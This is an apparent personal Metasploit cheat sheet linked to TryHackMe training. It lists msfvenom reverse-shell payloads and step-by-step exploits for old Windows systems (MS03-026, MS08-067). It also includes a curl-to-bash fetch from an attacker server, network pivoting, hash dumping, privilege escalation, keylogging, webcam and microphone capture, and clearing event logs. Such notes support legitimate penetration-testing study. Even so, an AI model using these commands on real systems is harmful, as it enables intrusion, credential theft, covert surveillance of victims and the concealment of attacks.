Metasploit

Set the payload:

set payload <path>

Set the exploit:

use exploit/<path>

Quick Commands

• ctrl + z: Background a session

• setg <name> <value>: Set global value

• sessions -l: See background sessions

• sessions -i <session num>: Go back into backgrounded sessions

• options: Show parameters

• hashdump: Dump hashes

• unset payload: Clear payload

• post/windows/gather/hashdump: Windows hashdump alt

• ipconfig: Grab interface info

• run autoroute -s <interfaceIP>/<Cidr Mask>: Network pivot

PHP web Meterpreter shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php

HTA RSH

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f hta-psh -o thm.hta

# OR you can do it through Metasploit
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp

Easy WinXP pwn

IN the metasploit console:

use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/bind_tcp
set RHOST <xp machine IP>
exploit

Easy Win2000 pwn

IN the metasploit console:

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost <Target IP>
set lhost <attacker IP>
set lport <attacker port>
exploit

Auxiliary Port Scan

# In the meterpreter shell of the infected machine
run autoroute -s <interfaceIP>/<Cidr Mask>
# Ctrl+Z to background she shell
auxiliary/scanner/portscan/tcp
set RHOSTS <pivot IP>/<Cidr Mask>
set ports <port 1>,<port 2>,<port n>
set threads 50
run

Privilege Escalation

To elevate your privilege you can use the commands:

use priv
getsystem

# OR
use exploit/windows/local/<technique>
# SET YOUR OPTIONS
exploit

Screen Capture:

# Elevate privlages
getsystem
# Load Library 
use espia
# Migrate to Explorer.exe
ps
migrate <pid of explorer.exe>
# Grabb Screenshot
screengrab

Linux Elevate Your Shell:

Generate your payloads:

msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=1234 -f raw > shell.sh

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.bin

Start listener and server:

python3 -m http.server
nc -nlvp 1234

Use your unstable shell to download the stable shell bin:

curl <ip>:8000/shell.sh | bash

Start your meterpreter listener:

set payload linux/x86/meterpreter/reverse_tcp
use exploit/multi/handler
exploit

Download your meterpreter payload and run it:

curl -o /tmp/shell.bin <ip>:8000/shell.bin
chmod +x /tmp/shell.bin
cd /tmp
./shell.bin

Elevate the shell's permissions:

^Z
use post/multi/recon/local_exploit_suggester
exploit

Using the MFSDB and workspaces:

systemctl start postgresql
msfdb init
msfconsole
db_status

• workspace: View workspace

• workspace -a <workspace name>: Add a workspace

• workspace -d <workspace name>: Delete a workspace

• workspace <workspace name>: Change current workspace

• workspace -h: Show workspace options

• help: Show database commands

• db_nmap <params> <ip>: Save nmap scan to db

• hosts: Get host information

• services: Get service information

• hosts -R: Add hosts to RHOST param

• services -S <service name>: Search for service in all hosts

Amazing THM Quick Reference command list:

Core commands

• background: Backgrounds the current session

• exit: Terminate the Meterpreter session

• guid: Get the session GUID (Globally Unique Identifier)

• help: Displays the help menu

• info: Displays information about a Post module

• irb: Opens an interactive Ruby shell on the current session

• load: Loads one or more Meterpreter extensions

• migrate: Allows you to migrate Meterpreter to another process

• run: Executes a Meterpreter script or Post module

• sessions: Quickly switch to another session

File system commands

• cd: Will change directory

• ls: Will list files in the current directory (dir will also work)

• pwd: Prints the current working directory

• edit: will allow you to edit a file

• cat: Will show the contents of a file to the screen

• rm: Will delete the specified file

• search: Will search for files

• upload: Will upload a file or directory

• download: Will download a file or directory

Networking commands

• arp: Displays the host ARP (Address Resolution Protocol) cache

• ifconfig: Displays network interfaces available on the target system

• netstat: Displays the network connections

• portfwd: Forwards a local port to a remote service

• route: Allows you to view and modify the routing table

System commands

• clearev: Clears the event logs

• execute: Executes a command

• getpid: Shows the current process identifier

• getuid: Shows the user that Meterpreter is running as

• kill: Terminates a process

• pkill: Terminates processes by name

• ps: Lists running processes

• reboot: Reboots the remote computer

• shell: Drops into a system command shell

• shutdown: Shuts down the remote computer

• sysinfo: Gets information about the remote system, such as OS

Others Commands (these will be listed under different menu categories in the help menu)

• idletime: Returns the number of seconds the remote user has been idle

• keyscan_dump: Dumps the keystroke buffer

• keyscan_start: Starts capturing keystrokes

• keyscan_stop: Stops capturing keystrokes

• screenshare: Allows you to watch the remote user's desktop in real time

• screenshot: Grabs a screenshot of the interactive desktop

• record_mic: Records audio from the default microphone for X seconds

• webcam_chat: Starts a video chat

• webcam_list: Lists webcams

• webcam_snap: Takes a snapshot from the specified webcam

• webcam_stream: Plays a video stream from the specified webcam

• getsystem: Attempts to elevate your privilege to that of local system

• hashdump: Dumps the contents of the SAM database